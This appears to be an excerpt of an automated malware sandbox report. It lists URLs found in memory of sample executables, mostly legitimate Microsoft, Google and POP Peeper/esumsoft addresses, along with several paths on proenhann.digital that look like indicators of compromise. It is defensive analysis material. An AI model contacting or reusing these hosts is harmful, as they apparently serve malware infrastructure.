                    Source: svchost015.exe, 00000001.00000003.1706105267.0000000003834000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://login.microsoftonline.com/common/oauth2/nativeclientesumsoft.poppeeper://authoutlook_%uwl.im
                    Source: svchost015.exe, 00000001.00000003.1706105267.0000000003834000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://login.microsoftonline.com/common/oauth2/v2.0/authorize
                    Source: svchost015.exe, 00000001.00000003.1706105267.0000000003834000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://login.microsoftonline.com/common/oauth2/v2.0/token
                    Source: svchost015.exe, 00000001.00000003.1706105267.0000000003834000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://mail.google.com/
                    Source: powershell.exe, 0000000B.00000002.1844484241.0000000005D4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1979002205.0000000005C89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://outlook.office.com/IMAP.AccessAsUser.All
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://outlook.office.com/POP.AccessAsUser.All
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://outlook.office.com/SMTP.Send
                    Source: svchost015.exe, 00000001.00000003.1706105267.0000000003834000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://outlook.office.com/SMTP.Sendhttps://login.microsoftonline.com/common/oauth2/v2.0/authorize?c
                    Source: svchost015.exe, 00000001.00000003.1706105267.0000000003834000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://outlook.office.com/SMTP.Sendhttps://outlook.office.com/IMAP.AccessAsUser.All
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2126674525.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1981303672.00000000009A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://proenhann.digital/
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2126674525.0000000000A28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://proenhann.digital/W
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2032860989.0000000003902000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2052778119.0000000003900000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2073905851.0000000003912000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2056832148.0000000003912000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2207184481.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2059156988.0000000003912000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2126674525.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2037882872.000000000390D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2034205082.000000000390C000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2054043095.0000000003905000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2037912099.0000000003910000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1981157929.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://proenhann.digital/thnb
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2207184481.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2126674525.0000000000A28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://proenhann.digital/thnb5
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2179860571.00000000009CD000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2206752083.00000000009CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://proenhann.digital/thnb?J
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2179860571.00000000009CD000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2206752083.00000000009CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://proenhann.digital/thnbd
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2004710436.000000000390E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://proenhann.digital/thnbe
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2052778119.000000000390D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://proenhann.digital/thnbf
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2126674525.0000000000A28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://proenhann.digital/w
                    Source: nK8noQeiXl.exe, 00000000.00000002.1366301162.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000001.00000003.1745495782.0000000003945000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                    Source: svchost015.exe, 00000001.00000003.1706105267.0000000003834000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://support.google.com/accounts/answer/185833
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2040795636.0000000003C06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2040795636.0000000003C06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                    Source: svchost015.exe, 00000001.00000003.1707285660.0000000003AD4000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://update.esumsoft.com/Banner/poppeeper.ppb
                    Source: svchost015.exe, 00000001.00000003.1707285660.0000000003AD4000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://update.esumsoft.com/Banner/poppeeper.ppb12029Time:
                    Source: svchost015.exe, 00000001.00000003.1706588776.0000000003CFE000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://update.esumsoft.com/POPPeeper/
                    Source: svchost015.exe, 00000001.00000003.1706588776.0000000003CFE000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://update.esumsoft.com/POPPeeper/?date=000000&beta=&qc=1&WMVer=&WmFlags=&A=&if=&pac=&ppver=
                    Source: svchost015.exe, 00000001.00000003.1706932736.000000000384E000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://update.esumsoft.com/POPPeeper/WebMailVer.txt
                    Source: svchost015.exe, 00000001.00000003.1706932736.000000000384E000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://update.esumsoft.com/POPPeeper/WebMailVer.txtWebMailVer:
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2209383400.0000000003909000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2209776881.00000000039E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2209776881.00000000039E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
                    Source: DrjfIAN86u.exe, 00000003.00000003.1535033375.0000000002440000.00000004.00001000.00020000.00000000.sdmp, DrjfIAN86u.exe, 00000003.00000002.2572553577.0000000002111000.00000004.00001000.00020000.00000000.sdmp, DrjfIAN86u.exe, 00000003.00000003.1535224425.0000000002111000.00000004.00001000.00020000.00000000.sdmp, DrjfIAN86u.tmp, 00000004.00000002.2574127597.00000000021E8000.00000004.00001000.00020000.00000000.sdmp, DrjfIAN86u.tmp, 00000004.00000002.2573579155.000000000078A000.00000004.00000020.00020000.00000000.sdmp, DrjfIAN86u.tmp, 00000004.00000003.1538252672.00000000021E8000.00000004.00001000.00020000.00000000.sdmp, DrjfIAN86u.tmp, 00000004.00000003.1538168918.0000000003100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.easycutstudio.com/support.html
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1991855206.00000000039F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com
                    Source: svchost015.exe, 00000001.00000003.1706588776.0000000003CFE000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/buy/
                    Source: svchost015.exe, 00000001.00000003.1706105267.0000000003834000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/buy/?prod=pppro
                    Source: svchost015.exe, 00000001.00000003.1706105267.0000000003834000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/buy/?prod=ppprohttps://www.esumsoft.com/products/pop-peeper/pro/0
                    Source: svchost015.exe, 00000001.00000003.1707285660.0000000003AD4000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/buy/https://www.esumsoft.com/buy/clk
                    Source: svchost015.exe, 00000001.00000003.1706329291.0000000003A91000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/customfiles/PP_Lang/LangFiles.txt
                    Source: svchost015.exe, 00000001.00000003.1706329291.0000000003A91000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/customfiles/PP_Lang/LangFiles.txtThread
                    Source: svchost015.exe, 00000001.00000003.1707285660.0000000003AD4000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/customscripts/ProductActivationV3.php?ver=3&c=1
                    Source: svchost015.exe, 00000001.00000003.1707285660.0000000003AD4000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/customscripts/ProductActivationV3.php?ver=3&c=1https://www.esumsoft.com/cus
                    Source: svchost015.exe, 00000001.00000003.1707285660.0000000003AD4000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/customscripts/ProductActivationV4.php?ver=4&c=1
                    Source: svchost015.exe, 00000001.00000003.1706105267.0000000003834000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/customscripts/curtime.php
                    Source: svchost015.exe, 00000001.00000003.1706105267.0000000003834000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/customscripts/curtime.phphttp://https://Use
                    Source: svchost015.exe, 00000001.00000003.1705800888.0000000003CC7000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/donation/
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/download/
                    Source: svchost015.exe, 00000001.00000003.1706105267.0000000003834000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/pp-faqdatapath
                    Source: svchost015.exe, 00000001.00000003.1706105267.0000000003834000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/pp-faqdatapathIni
                    Source: svchost015.exe, 00000001.00000003.1706329291.0000000003A91000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000001.00000003.1706105267.0000000003834000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/pp-pro/
                    Source: svchost015.exe, 00000001.00000003.1706588776.0000000003CFE000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/ppfaq?q=error_ssl_hostnamemismatch
                    Source: svchost015.exe, 00000001.00000003.1706588776.0000000003CFE000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/ppfaq?q=error_ssl_hostnamemismatchunknown
                    Source: svchost015.exe, 00000001.00000003.1706588776.0000000003CFE000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/ppfaq?q=error_ssl_selfsigned
                    Source: svchost015.exe, 00000001.00000003.1706588776.0000000003CFE000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/ppfaq?q=error_ssl_selfsignedself
                    Source: svchost015.exe, 00000001.00000003.1707285660.0000000003AD4000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/products/pop-peeper
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/products/pop-peeper/banner/?blocked=1
                    Source: svchost015.exe, 00000001.00000003.1707285660.0000000003AD4000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/products/pop-peeper/banner/?blocked=1https://www.esumsoft.com/products/pop-
                    Source: svchost015.exe, 00000001.00000003.1707285660.0000000003AD4000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/products/pop-peeper/banner/?blocked=1m05Click
                    Source: svchost015.exe, 00000001.00000003.1706588776.0000000003CFE000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/products/pop-peeper/faq/
                    Source: svchost015.exe, 00000001.00000003.1706588776.0000000003CFE000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/products/pop-peeper/faq/https://www.esumsoft.com/Backup/Restorehttps://www.
                    Source: svchost015.exe, 00000001.00000003.1706588776.0000000003CFE000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/products/pop-peeper/plugins/#SkinNotifier
                    Source: svchost015.exe, 00000001.00000003.1706588776.0000000003CFE000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/products/pop-peeper/plugins/#SkinNotifier5.0You
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/products/pop-peeper/plus-pack/
